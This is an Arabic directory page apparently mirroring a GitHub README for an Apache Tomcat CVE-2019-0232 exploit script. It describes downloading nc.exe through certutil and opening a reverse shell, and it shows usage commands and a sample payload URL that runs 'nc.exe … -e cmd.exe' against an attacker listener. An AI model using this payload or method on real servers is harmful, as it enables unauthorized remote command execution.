Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-0232 — مرحبًا، هذا كود منقّح ومحسّن لـ CVE-2019-0232 | Kitploit
أدوات/GitHubGitHub/dharan10/cve-2019-0232
توليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubdharan10/cve-2019-0232

CVE-2019-0232

مرحبًا، هذا كود منقّح ومحسّن لـ CVE-2019-0232

عرض المستودع
22منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال ثغرة Apache Tomcat CVE-2019-0232

يستغل هذا السكريبت ثغرة CVE-2019-0232 في Apache Tomcat، والتي تسمح بتنفيذ الأوامر عن بُعد من خلال المعالجة غير السليمة لسكريبت ism.bat. يستخدم السكريبت تقنية القشرة العكسية (reverse shell) باستخدام certutil و nc.exe (Netcat) للوصول عن بُعد إلى النظام المستهدف.

نظرة عامة على الثغرة:

  • معرّف CVE: CVE-2019-0232
  • المنتجات المتأثرة: Apache Tomcat 6.x و7.x و8.x و9.x
  • الوصف:
    • CVE-2019-0232 هي ثغرة في معالجة Apache Tomcat للطلبات الموجهة إلى ism.bat قد تسمح للمهاجمين بتنفيذ أوامر اعتباطية على الخادم. تحدث هذه الثغرة بسبب عدم التحقق السليم من مدخلات المستخدم، مما يسمح للمهاجمين بتشغيل أوامر اعتباطية من خلال طلب مصمم خصيصًا.
    • يمكن استغلال الثغرة لتنزيل ملف nc.exe خبيث من خادم بعيد واستخدامه لفتح قشرة عكسية.

المتطلبات:

  • Python 3: السكريبت مصمم للعمل مع Python 3.x.
  • Netcat: يجب استضافة مستمع Netcat (nc.exe) على خادم لتلقي اتصال القشرة العكسية.
  • Apache Tomcat: يجب أن يكون الخادم الهدف يعمل بنسخة ضعيفة من Apache Tomcat (6.x أو 7.x أو 8.x أو 9.x) قابلة للتأثر بـ CVE-2019-0232.

كيف يعمل:

  1. تنزيل nc.exe: يرسل السكريبت طلبًا مصممًا إلى خادم Tomcat الضعيف لتنزيل ملف nc.exe (Netcat) إلى الجهاز الهدف باستخدام certutil.
  2. القشرة العكسية: بمجرد تنزيل nc.exe، يتم إرسال طلب آخر لتنفيذ أمر القشرة العكسية، والذي يعيد الاتصال بمستمع Netcat الخاص بالمهاجم.

الاستخدام:

1. استنساخ المستودع:

root@kitploit:~
git clone https://github.com/Dharan10/CVE-2019-0232.git
cd CVE-2019-0232

2. عدّل السكريبت أو شغّله بإدخالات المستخدم:

root@kitploit:~
python3 exploit.py

3. سيُطلب منك إدخال التفاصيل التالية:

root@kitploit:~
Target Host: The IP address of the Apache Tomcat server to exploit.
Target Port: The port of the target server (default: 8080).
Server IP: The IP address of the server hosting nc.exe.
Server Port: The port number where nc.exe is hosted (default: 80).
Netcat Listener IP: Your IP address that will receive the reverse shell.
Netcat Listener Port: The port on which you are listening for the reverse shell.

مثال:

root@kitploit:~
[*] Sending payload to download nc.exe...
[+] URL1 Response: 200
[*] Sending payload to execute reverse shell...
[+] URL2 Response: 200
[*] Reverse shell payload URL: http://192.168.1.10:8080/cgi/ism.bat?&nc.exe+192.168.1.100+1234+-e+cmd.exe

بعد التنفيذ بنجاح، يجب أن تحصل على اتصال قشرة عكسية يعود إلى مستمع Netcat الخاص بك.

إخلاء المسؤولية:

هذا السكريبت مخصص للأغراض التعليمية فقط. لا تستخدمه في أنشطة خبيثة. احرص دائمًا على الحصول على إذن مناسب قبل محاولة أي اختبار اختراق أو تدقيق أمني. قد يؤدي إساءة استخدام هذا السكريبت إلى عواقب قانونية.

ملاحظات مهمة:

تأكد من أن خادم Apache Tomcat غير محدث ضد CVE-2019-0232 قبل استخدام هذا الاستغلال. قد يتطلب السكريبت صلاحيات إدارية اعتمادًا على تكوين النظام الهدف.

المؤلف:

المؤلف: A!Z3N(Dharan) صُنع بقوة!

الترخيص:

هذا المشروع مرخص بموجب رخصة MIT.

ومع ذلك، استخدمه على مسؤوليتك الخاصة. هذا الكود مقدم لأغراض تعليمية فقط. باستخدامك لهذا الكود، فأنت توافق على تحمل المسؤولية الكاملة عن أي ناتج عن استخدامه. قد يؤدي إساءة الاستخدام أو الاستخدام غير المصرح به لهذا الاستغلال إلى عواقب قانونية. احصل دائمًا على إذن مناسب قبل إجراء أي اختبار أمان أو اختبار اختراق على أي نظام.

أنت حر في استخدام هذا الكود وتعديله وتوزيعه، ولكن لأغراض أخلاقية فقط. المؤلف غير مسؤول عن أي ضرر ناتج عن هذا الكود.

لا تستخدم هذا الاستغلال دون إذن صريح من مالك النظام الهدف.

تنزيل الأداة